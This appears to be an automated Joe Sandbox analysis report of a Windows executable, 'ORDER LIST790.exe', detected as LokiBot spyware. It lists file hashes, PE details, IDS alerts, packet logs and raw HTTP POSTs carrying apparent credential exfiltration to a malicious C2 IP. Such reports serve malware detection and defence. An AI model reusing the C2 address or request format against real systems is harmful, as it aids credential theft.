http://www.founder.com.cn/cn/cThe	ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://fontfabrik.com	ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn	ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://httpd.apache.org/	ORDER LIST790.exe, 00000004.00000002.289238555.000000000356D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/	ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fonts.com	ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sakkal.com	ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://centos.org	ORDER LIST790.exe, 00000004.00000002.289238555.000000000356D000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
66.29.145.162	unknown	United States		19538	ADVANTAGECOMUS	true

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	682143
Start date and time:	2022-08-11 05:36:07 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 21s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	ORDER LIST790.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/3@0/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Failed
HCA Information:	Successful, ratio: 99% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe Adjust boot time Enable AMSI

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
Excluded IPs from analysis (whitelisted): 23.211.6.115
Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, fs.microsoft.com, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
05:37:17	API Interceptor	2x Sleep call for process: ORDER LIST790.exe modified

Process:	C:\Users\user\Desktop\ORDER LIST790.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1308
Entropy (8bit):	5.345811588615766
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84FsXE8:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzu
MD5:	2E016B886BDB8389D2DD0867BE55F87B
SHA1:	25D28EF2ACBB41764571E06E11BF4C05DD0E2F8B
SHA-256:	1D037CF00A8849E6866603297F85D3DABE09535E72EDD2636FB7D0F6C7DA3427
SHA-512:	C100729153954328AA2A77EECB2A3CBD03CB7E8E23D736000F890B17AAA50BA87745E30FB9E2B0D61E16DCA45694C79B4CE09B9F4475220BEB38CAEA546CFC2A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck

Download File

Process:	C:\Users\user\Desktop\ORDER LIST790.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a

Download File

Process:	C:\Users\user\Desktop\ORDER LIST790.exe
File Type:	data
Category:	dropped
Size (bytes):	46
Entropy (8bit):	1.0424600748477153
Encrypted:	false
SSDEEP:	3:/lbON:u
MD5:	89CA7E02D8B79ED50986F098D5686EC9
SHA1:	A602E0D4398F00C827BFCF711066E67718CA1377
SHA-256:	30AC626CBD4A97DB480A0379F6D2540195F594C967B7087A26566E352F24C794
SHA-512:	C5F453E32C0297E51BE43F84A7E63302E7D1E471FADF8BB789C22A4D6E03712D26E2B039D6FBDBD9EBD35C4E93EC27F03684A7BBB67C4FADCCE9F6279417B5DE
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................user.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.176290841783126
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	ORDER LIST790.exe
File size:	872960
MD5:	80e4b72d26806ed5f245142166a48145
SHA1:	c07deb8c6fc551636d842c18d0540594afbe1c68
SHA256:	c5847da2de3c9aee81dc121287bb4c4c366d8c978f604cac6e19f80da1a46094
SHA512:	a520b295fb2cc2cccf94f0b6ad031d21680d39a4e906220982c43450a084d526beaafbac8cb4a2d01a97d8333c14c5bbcbb35f31e9b190112164e321d8c5b937
SSDEEP:	12288:4smY4vwHmQlBV8vpc++NxD9TP0gtp2Wftu4FnGV9nRUnlcsM2TgN/0s:/mY4vwHmQlBVapSXDuWFMVMlcmgi
TLSH:	9B058CEEAA98C45BCF604774F84944F42B66ACE1F021DDAF6893BC21F53239E515BD02
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....l.b..............0..>...........]... ...`....@.. ....................................@................................

File Icon


Icon Hash:	00684068688eb200

Static PE Info

General

Entrypoint:	0x4c5d86
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x62F46CA3 [Thu Aug 11 02:42:43 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc5d34	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc6000	0x10ef4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xd8000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xc3d8c	0xc3e00	False	0.6307285019144863	data	7.320980599570163	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xc6000	0x10ef4	0x11000	False	0.06841681985294118	data	4.12604928193498	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xd8000	0xc	0x200	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0xc6100	0x10828	data
RT_GROUP_ICON	0xd6938	0x14	data
RT_VERSION	0xd695c	0x398	data
RT_MANIFEST	0xd6d04	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.366.29.145.16249741802024317 08/11/22-05:37:23.228158	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49741	80	192.168.2.3	66.29.145.162
192.168.2.366.29.145.16249743802024318 08/11/22-05:37:28.256446	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49743	80	192.168.2.3	66.29.145.162
192.168.2.366.29.145.16249742802024312 08/11/22-05:37:26.351786	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49742	80	192.168.2.3	66.29.145.162
192.168.2.366.29.145.16249742802021641 08/11/22-05:37:26.351786	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49742	80	192.168.2.3	66.29.145.162
192.168.2.366.29.145.16249743802024313 08/11/22-05:37:28.256446	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49743	80	192.168.2.3	66.29.145.162
192.168.2.366.29.145.16249742802024317 08/11/22-05:37:26.351786	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49742	80	192.168.2.3	66.29.145.162
192.168.2.366.29.145.16249741802024312 08/11/22-05:37:23.228158	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49741	80	192.168.2.3	66.29.145.162
192.168.2.366.29.145.16249741802021641 08/11/22-05:37:23.228158	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49741	80	192.168.2.3	66.29.145.162
192.168.2.366.29.145.16249743802021641 08/11/22-05:37:28.256446	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49743	80	192.168.2.3	66.29.145.162

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 11, 2022 05:37:23.047916889 CEST	49741	80	192.168.2.3	66.29.145.162
Aug 11, 2022 05:37:23.214819908 CEST	80	49741	66.29.145.162	192.168.2.3
Aug 11, 2022 05:37:23.216342926 CEST	49741	80	192.168.2.3	66.29.145.162
Aug 11, 2022 05:37:23.228157997 CEST	49741	80	192.168.2.3	66.29.145.162
Aug 11, 2022 05:37:23.395914078 CEST	80	49741	66.29.145.162	192.168.2.3
Aug 11, 2022 05:37:23.396012068 CEST	49741	80	192.168.2.3	66.29.145.162
Aug 11, 2022 05:37:23.563275099 CEST	80	49741	66.29.145.162	192.168.2.3
Aug 11, 2022 05:37:24.124579906 CEST	80	49741	66.29.145.162	192.168.2.3
Aug 11, 2022 05:37:24.124609947 CEST	80	49741	66.29.145.162	192.168.2.3
Aug 11, 2022 05:37:24.124631882 CEST	80	49741	66.29.145.162	192.168.2.3
Aug 11, 2022 05:37:24.124653101 CEST	80	49741	66.29.145.162	192.168.2.3
Aug 11, 2022 05:37:24.124672890 CEST	80	49741	66.29.145.162	192.168.2.3
Aug 11, 2022 05:37:24.124700069 CEST	49741	80	192.168.2.3	66.29.145.162
Aug 11, 2022 05:37:24.124749899 CEST	49741	80	192.168.2.3	66.29.145.162
Aug 11, 2022 05:37:24.124942064 CEST	49741	80	192.168.2.3	66.29.145.162
Aug 11, 2022 05:37:26.179301023 CEST	49742	80	192.168.2.3	66.29.145.162
Aug 11, 2022 05:37:26.344233990 CEST	80	49742	66.29.145.162	192.168.2.3
Aug 11, 2022 05:37:26.344449043 CEST	49742	80	192.168.2.3	66.29.145.162
Aug 11, 2022 05:37:26.351785898 CEST	49742	80	192.168.2.3	66.29.145.162
Aug 11, 2022 05:37:26.516570091 CEST	80	49742	66.29.145.162	192.168.2.3
Aug 11, 2022 05:37:26.520668030 CEST	49742	80	192.168.2.3	66.29.145.162
Aug 11, 2022 05:37:26.685410023 CEST	80	49742	66.29.145.162	192.168.2.3
Aug 11, 2022 05:37:27.252741098 CEST	80	49742	66.29.145.162	192.168.2.3
Aug 11, 2022 05:37:27.252801895 CEST	80	49742	66.29.145.162	192.168.2.3
Aug 11, 2022 05:37:27.252851963 CEST	80	49742	66.29.145.162	192.168.2.3
Aug 11, 2022 05:37:27.252891064 CEST	80	49742	66.29.145.162	192.168.2.3
Aug 11, 2022 05:37:27.252917051 CEST	80	49742	66.29.145.162	192.168.2.3
Aug 11, 2022 05:37:27.253021002 CEST	49742	80	192.168.2.3	66.29.145.162
Aug 11, 2022 05:37:27.253202915 CEST	49742	80	192.168.2.3	66.29.145.162
Aug 11, 2022 05:37:27.253220081 CEST	49742	80	192.168.2.3	66.29.145.162
Aug 11, 2022 05:37:28.072700024 CEST	49743	80	192.168.2.3	66.29.145.162
Aug 11, 2022 05:37:28.240042925 CEST	80	49743	66.29.145.162	192.168.2.3
Aug 11, 2022 05:37:28.240178108 CEST	49743	80	192.168.2.3	66.29.145.162
Aug 11, 2022 05:37:28.256445885 CEST	49743	80	192.168.2.3	66.29.145.162
Aug 11, 2022 05:37:28.423341990 CEST	80	49743	66.29.145.162	192.168.2.3
Aug 11, 2022 05:37:28.423455954 CEST	49743	80	192.168.2.3	66.29.145.162
Aug 11, 2022 05:37:28.590348005 CEST	80	49743	66.29.145.162	192.168.2.3
Aug 11, 2022 05:37:29.144061089 CEST	80	49743	66.29.145.162	192.168.2.3
Aug 11, 2022 05:37:29.144119978 CEST	80	49743	66.29.145.162	192.168.2.3
Aug 11, 2022 05:37:29.144170046 CEST	80	49743	66.29.145.162	192.168.2.3
Aug 11, 2022 05:37:29.144268990 CEST	49743	80	192.168.2.3	66.29.145.162
Aug 11, 2022 05:37:29.144273043 CEST	80	49743	66.29.145.162	192.168.2.3
Aug 11, 2022 05:37:29.144311905 CEST	80	49743	66.29.145.162	192.168.2.3
Aug 11, 2022 05:37:29.144356966 CEST	49743	80	192.168.2.3	66.29.145.162
Aug 11, 2022 05:37:29.144377947 CEST	49743	80	192.168.2.3	66.29.145.162
Aug 11, 2022 05:37:29.144434929 CEST	49743	80	192.168.2.3	66.29.145.162

HTTP Request Dependency Graph

66.29.145.162

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49741	66.29.145.162	80	C:\Users\user\Desktop\ORDER LIST790.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 05:37:23.228157997 CEST	1021	OUT	POST /?112233 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 66.29.145.162 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 6B020D42 Content-Length: 190 Connection: close
Aug 11, 2022 05:37:24.124579906 CEST	1023	IN	HTTP/1.1 200 OK Date: Thu, 11 Aug 2022 03:37:23 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 X-Powered-By: PHP/5.4.16 Content-Length: 5017 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 48 54 54 50 20 53 65 72 76 65 72 20 54 65 73 74 20 50 61 67 65 20 70 6f 77 65 72 65 64 20 62 79 20 43 65 6e 74 4f 53 3c 2f 74 69 74 6c 65 3e 0d 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 42 6f 6f 74 73 74 72 61 70 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6e 6f 69 6e 64 65 78 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 6e 6f 69 6e 64 65 78 2f 63 73 73 2f 6f 70 65 6e 2d 73 61 6e 73 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 09 09 20 0d 0a 0d 0a 62 6f 64 79 20 7b 0d 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 31 30 30 3b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 23 63 63 63 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 31 30 2c 20 32 34 2c 20 35 35 2c 20 31 29 3b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0d 0a 7d 0d 0a 0d 0a 68 32 2c 20 68 33 2c 20 68 34 20 7b 0d 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0d 0a 7d 0d 0a 0d 0a 68 32 20 7b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0d 0a 7d 0d 0a 0d 0a 2e 6a 75 6d 62 6f 74 72 6f 6e 20 7b 0d 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 3b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 28 32 31 32 2c 32 31 32 2c 32 32 31 29 3b 20 2f 2a 20 4f 6c 64 20 62 72 6f 77 73 65 72 73 20 2a 2f 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 61 64 69 61 6c 2d 67 72 61 64 69 65 6e 74 28 65 6c 6c 69 70 73 65 20 61 74 20 63 65 6e 74 65 72 20 74 6f 70 2c 20 72 67 62 61 28 32 35 35 2c 32 35 35 2c 32 35 35 2c 31 29 20 30 25 2c 72 67 62 61 28 31 37 34 2c 31 37 34 2c 31 38 33 2c 31 29 20 31 30 30 25 29 3b 20 2f 2a 20 57 33 43 20 2a 2f 0d 0a 7d 0d 0a 0d 0a 2e 6a 75 6d 62 6f 74 72 6f 6e 20 68 31 20 7b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 38 70 78 3b 0d 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0d 0a 20 20 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 32 70 78 20 30 70 78 20 23 61 62 63 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Apache HTTP Server Test Page powered by CentOS</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> ... Bootstrap --> <link href="/noindex/css/bootstrap.min.css" rel="stylesheet"> <link rel="stylesheet" href="noindex/css/open-sans.css" type="text/css" /><style type="text/css">... body { font-family: "Open Sans", Helvetica, sans-serif; font-weight: 100; color: #ccc; background: rgba(10, 24, 55, 1); font-size: 16px;}h2, h3, h4 { font-weight: 200;}h2 { font-size: 28px;}.jumbotron { margin-bottom: 0; color: #333; background: rgb(212,212,221); /* Old browsers / background: radial-gradient(ellipse at center top, rgba(255,255,255,1) 0%,rgba(174,174,183,1) 100%); / W3C */}.jumbotron h1 { font-size: 128px; font-weight: 700; color: white; text-shadow: 0px 2px 0px #abc,

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49742	66.29.145.162	80	C:\Users\user\Desktop\ORDER LIST790.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 05:37:26.351785898 CEST	1028	OUT	POST /?112233 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 66.29.145.162 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 6B020D42 Content-Length: 190 Connection: close
Aug 11, 2022 05:37:27.252741098 CEST	1030	IN	HTTP/1.1 200 OK Date: Thu, 11 Aug 2022 03:37:26 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 X-Powered-By: PHP/5.4.16 Content-Length: 5017 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 48 54 54 50 20 53 65 72 76 65 72 20 54 65 73 74 20 50 61 67 65 20 70 6f 77 65 72 65 64 20 62 79 20 43 65 6e 74 4f 53 3c 2f 74 69 74 6c 65 3e 0d 0a 09 09 3c 6d 65 74 61 